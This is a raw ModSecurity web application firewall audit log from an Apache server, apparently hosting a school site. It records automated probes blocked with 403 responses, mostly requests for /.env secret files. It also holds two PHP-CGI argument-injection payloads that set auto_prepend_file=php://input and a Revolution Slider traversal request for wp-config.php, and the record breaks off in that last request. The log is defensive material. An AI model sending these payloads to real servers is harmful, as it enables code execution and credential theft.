X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.86.63
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--340d815e-C--
demo.sayHello
--340d815e-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--340d815e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745801133126635 6676 (- - -)
Stopwatch2: 1745801133126635 6676; combined=5056, p1=658, p2=4127, p3=36, p4=41, p5=112, sr=131, sw=82, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--340d815e-Z--
--f4abac4a-A--
[28/Apr/2025:10:17:29 +0700] aA7zScJruAEpaSEZ7DDHVAAAABM 103.236.140.4 44288 103.236.140.4 8181
--f4abac4a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 138.197.196.84
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 138.197.196.84
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--f4abac4a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f4abac4a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745810249060376 814 (- - -)
Stopwatch2: 1745810249060376 814; combined=360, p1=324, p2=0, p3=0, p4=0, p5=36, sr=113, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f4abac4a-Z--
--f0bae839-A--
[28/Apr/2025:10:53:44 +0700] aA77yGj1i6BJZll4jGO9IQAAAIY 103.236.140.4 52616 103.236.140.4 8181
--f0bae839-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.137.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.137.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--f0bae839-C--
--f0bae839-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0bae839-E--
--f0bae839-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745812424648518 5651 (- - -)
Stopwatch2: 1745812424648518 5651; combined=3718, p1=548, p2=3138, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0bae839-Z--
--9c457652-A--
[28/Apr/2025:10:56:31 +0700] aA78b1T4soy9XydcuKavMAAAAEU 103.236.140.4 53292 103.236.140.4 8181
--9c457652-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 159.89.174.87
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 159.89.174.87
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--9c457652-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9c457652-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745812591686723 726 (- - -)
Stopwatch2: 1745812591686723 726; combined=261, p1=230, p2=0, p3=0, p4=0, p5=30, sr=64, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9c457652-Z--
--6a605951-A--
[28/Apr/2025:11:21:03 +0700] aA8CL1T4soy9XydcuKawhAAAAEY 103.236.140.4 59024 103.236.140.4 8181
--6a605951-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 139.59.143.102
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 139.59.143.102
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--6a605951-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a605951-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745814063449962 962 (- - -)
Stopwatch2: 1745814063449962 962; combined=390, p1=349, p2=0, p3=0, p4=0, p5=41, sr=143, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a605951-Z--
--41bcee15-A--
[28/Apr/2025:13:23:45 +0700] aA8e8Wj1i6BJZll4jGPGKQAAAIY 103.236.140.4 60434 103.236.140.4 8181
--41bcee15-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept-Charset: utf-8
--41bcee15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--41bcee15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745821425646826 821 (- - -)
Stopwatch2: 1745821425646826 821; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=121, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--41bcee15-Z--
--f0e5c506-A--
[28/Apr/2025:13:36:08 +0700] aA8h2FT4soy9XydcuKa3qgAAAFM 103.236.140.4 35230 103.236.140.4 8181
--f0e5c506-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 142.93.143.8
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 142.93.143.8
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--f0e5c506-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0e5c506-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745822168140528 735 (- - -)
Stopwatch2: 1745822168140528 735; combined=279, p1=247, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0e5c506-Z--
--90d6e057-A--
[28/Apr/2025:15:40:43 +0700] aA8_C4_5LpLtj_OTfS_xcwAAAMQ 103.236.140.4 36554 103.236.140.4 8181
--90d6e057-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36
Accept-Charset: utf-8
--90d6e057-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--90d6e057-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745829643979384 778 (- - -)
Stopwatch2: 1745829643979384 778; combined=317, p1=275, p2=0, p3=0, p4=0, p5=41, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--90d6e057-Z--
--a8a8234c-A--
[28/Apr/2025:15:40:50 +0700] aA8_EsJruAEpaSEZ7DDdPQAAABE 103.236.140.4 36584 103.236.140.4 8181
--a8a8234c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 5.39.19.178
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 5.39.19.178
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--a8a8234c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a8a8234c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745829650489430 813 (- - -)
Stopwatch2: 1745829650489430 813; combined=360, p1=301, p2=0, p3=0, p4=0, p5=58, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a8a8234c-Z--
--cf375674-A--
[28/Apr/2025:15:41:09 +0700] aA8_JcJruAEpaSEZ7DDdRQAAAAA 103.236.140.4 36670 103.236.140.4 8181
--cf375674-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept-Charset: utf-8
--cf375674-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cf375674-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745829669869177 873 (- - -)
Stopwatch2: 1745829669869177 873; combined=440, p1=403, p2=0, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cf375674-Z--
--eab4b833-A--
[28/Apr/2025:16:10:45 +0700] aA9GFVT4soy9XydcuKbADwAAAFE 103.236.140.4 43666 103.236.140.4 8181
--eab4b833-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.172.56.145
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.172.56.145
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--eab4b833-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eab4b833-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745831445444453 805 (- - -)
Stopwatch2: 1745831445444453 805; combined=347, p1=309, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eab4b833-Z--
--6cfa261a-A--
[28/Apr/2025:16:22:08 +0700] aA9IwFT4soy9XydcuKbAmQAAAEw 103.236.140.4 46298 103.236.140.4 8181
--6cfa261a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--6cfa261a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6cfa261a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745832128019322 834 (- - -)
Stopwatch2: 1745832128019322 834; combined=365, p1=327, p2=0, p3=0, p4=0, p5=38, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6cfa261a-Z--
--82316c14-A--
[28/Apr/2025:16:22:10 +0700] aA9Iwmj1i6BJZll4jGPQDgAAAIM 103.236.140.4 46308 103.236.140.4 8181
--82316c14-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36
Accept-Charset: utf-8
--82316c14-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--82316c14-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745832130107629 926 (- - -)
Stopwatch2: 1745832130107629 926; combined=446, p1=391, p2=0, p3=0, p4=0, p5=55, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--82316c14-Z--
--c8012a63-A--
[28/Apr/2025:17:20:35 +0700] aA9Wc8JruAEpaSEZ7DDlWwAAAAg 103.236.140.4 42770 103.236.140.4 8181
--c8012a63-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 64.226.65.160
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 64.226.65.160
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--c8012a63-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c8012a63-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745835635108654 847 (- - -)
Stopwatch2: 1745835635108654 847; combined=350, p1=317, p2=0, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c8012a63-Z--
--bc952f45-A--
[28/Apr/2025:17:38:30 +0700] aA9apsJruAEpaSEZ7DDm-gAAABg 103.236.140.4 47036 103.236.140.4 8181
--bc952f45-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 167.99.210.137
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 167.99.210.137
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--bc952f45-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bc952f45-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745836710187557 769 (- - -)
Stopwatch2: 1745836710187557 769; combined=285, p1=253, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bc952f45-Z--
--5defac31-A--
[28/Apr/2025:18:00:03 +0700] aA9fs1T4soy9XydcuKbIvAAAAEc 103.236.140.4 52058 103.236.140.4 8181
--5defac31-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 46.101.111.185
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 46.101.111.185
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--5defac31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5defac31-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745838003115258 909 (- - -)
Stopwatch2: 1745838003115258 909; combined=366, p1=325, p2=0, p3=0, p4=0, p5=41, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5defac31-Z--
--42ccf10e-A--
[28/Apr/2025:19:57:44 +0700] aA97SFT4soy9XydcuKbxYgAAAEI 103.236.140.4 43364 103.236.140.4 8181
--42ccf10e-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 206.189.19.19
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 206.189.19.19
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--42ccf10e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--42ccf10e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745845064140788 963 (- - -)
Stopwatch2: 1745845064140788 963; combined=455, p1=402, p2=0, p3=0, p4=0, p5=52, sr=130, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--42ccf10e-Z--
--9a379451-A--
[28/Apr/2025:21:31:25 +0700] aA-RPcJruAEpaSEZ7DAjywAAAAo 103.236.140.4 46138 103.236.140.4 8181
--9a379451-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 157.230.19.140
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 157.230.19.140
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--9a379451-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a379451-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745850685734453 772 (- - -)
Stopwatch2: 1745850685734453 772; combined=319, p1=288, p2=0, p3=0, p4=0, p5=31, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a379451-Z--
--53bdec61-A--
[28/Apr/2025:21:36:10 +0700] aA-SWsJruAEpaSEZ7DAnrgAAAAY 103.236.140.4 32838 103.236.140.4 8181
--53bdec61-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 147.139.141.27
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 147.139.141.27
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--53bdec61-C--
--53bdec61-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--53bdec61-E--
--53bdec61-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745850970870959 4269 (- - -)
Stopwatch2: 1745850970870959 4269; combined=2760, p1=438, p2=2289, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--53bdec61-Z--
--1a660637-A--
[28/Apr/2025:21:49:42 +0700] aA-VhlT4soy9XydcuKYFwgAAAE4 103.236.140.4 48126 103.236.140.4 8181
--1a660637-B--
GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
